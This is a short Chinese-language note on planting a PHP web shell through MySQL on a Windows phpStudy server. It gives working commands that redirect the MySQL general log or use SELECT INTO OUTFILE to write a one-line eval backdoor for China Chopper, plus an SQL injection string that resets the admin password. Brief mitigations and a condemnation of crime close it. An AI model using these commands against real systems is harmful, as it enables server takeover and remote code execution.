第一种方式
cd C:\phpStudy\PHPTutorial\MySQL\bin
mysql -hlocalhost -uroot -proot
set global general_log=on;
set global general_log_file='C:\\Users\\Administrator\\Desktop\\conf\\shell.php';
select "<?php @eval($_POST['cmd']); ?>";//一句话木马,用中国菜刀连接
set global general_log=off;
//导出文件后缀为.php,php在执行此文件时,只有<?php ?>中间的代码会被执行,其他内容按html输出,不影响php执行一句话代码
//最根本解决方法有
//1,定期修改mysql密码
//2,检查提交页面数据过滤
//3,添加php_suhosin.dll扩展禁止eval();执行,windows下此方式实现有难度。
//111');UPDATE zd_admin SET name='admin',password='admin' where id = 1; select * from zd_admin where (name='3333
第二种方式
select * from admin into outfile 'C:\\phpStudy\\PHPTutorial\\other\\shell.php';
在此,强烈谴责通过科技手段,进行违法犯罪活动的人,你都不配做一个人!